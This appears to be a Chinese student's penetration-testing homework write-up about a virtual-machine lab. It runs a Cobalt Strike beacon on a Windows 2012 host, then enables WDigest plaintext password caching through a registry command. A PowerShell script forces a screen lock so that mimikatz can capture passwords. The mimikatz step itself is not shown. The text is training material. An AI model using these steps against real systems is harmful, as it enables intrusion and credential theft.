渗透第二次作业

cs与msf权限传递,以及mimikatz抓取win2012明文密码

1、准备三台虚拟机:

一台安装有cs的kali,网络模式为nat,

一台Win2012,有两张网卡,一张为NAT模式,一张为仅主机模式,分别对应内外网,

一台win10,网络模式为仅主机模式,模拟我们的内网主机。

2、在kali上面启动我们的cs服务区端

./teamserver ip password

新开一个终端,开启我们的cs客户端

./cobaltsrtike-client.sh

弹出登录界面,输入连接密码进入

3、点击cobaltstrike----listeners----add

新建一个监听者,名字为cs_win2012,添加http hosts为本机IP地址,httpport 为12345

点击payloads---选择windows stagerness payload -----listeners----beacon_x64.exe,这是我们的木马文件

4、进入到我们的kali终端,检查刚才的木马文件有没有生成,然后

python3 -m http.server 9999

5、到我们的win2012的浏览器输入http://192.168.163.164:9999/进行连接,找到我们的beacon_x64.exe,下载并运行

6、返回到我们的kali的csserver,看是否连接成功,右键interect,输入shell ipconfig查看

在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,我们可以使用修稿注册表的形式来进行读取

通过修改注册表来让Wdigest Auth保存明文口令:

复制代码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

如需恢复原样,只需将上图REG_DWORD的值1改为0即可。

复制代码
reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

修改注册表之后,修改了之后需要用户注销或者重新登陆之后才会生效。

使用强制锁屏脚本来实现

把如下代码保存为lock.ps1

复制代码
Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

输入

复制代码
 powershell -file lock.ps1

抓取明文密码

相关推荐
Bruce_Liuxiaowei9 小时前
2026年5月第4周网络安全形势周报
网络·人工智能·安全·web安全·网络安全·系统安全
山川绿水11 小时前
Bugku——原神祈愿
人工智能·网络安全·claude
锐速网络11 小时前
高防CDN实战:安全防护与访问加速一体化方案
网络安全·waf·ddos防御·高防cdn·访问加速·cn2专线·企业网络优化
其实防守也摸鱼13 小时前
软件安全与漏洞--软件安全编码
java·前端·网络·安全·网络安全·web·工具
2501_9200470317 小时前
iptables防火墙
linux·运维·网络安全
搞科研的小刘选手18 小时前
【人工智能专题研讨会】第五届人工智能与智能信息处理国际学术会议(AIIIP 2026)
人工智能·神经网络·机器学习·网络安全·数据挖掘·人机交互·信息处理
Chengbei1120 小时前
对标PentestGPT!新一代去中心化集群式AI全自动渗透测试工具
网络·人工智能·网络安全·去中心化·区块链·系统安全
梧六柒21 小时前
12-%00截断(Get型)
网络安全
Chockmans21 小时前
春秋云境CVE-2022-32992(文件上传和sql注入)保姆级教学
数据库·sql·安全·网络安全·网络攻击模型·春秋云境·cve-2022-32992
m0_7381207221 小时前
渗透测试基础知识——从零认识JWT(JSON Web Token)身份令牌
服务器·前端·安全·web安全·网络安全·json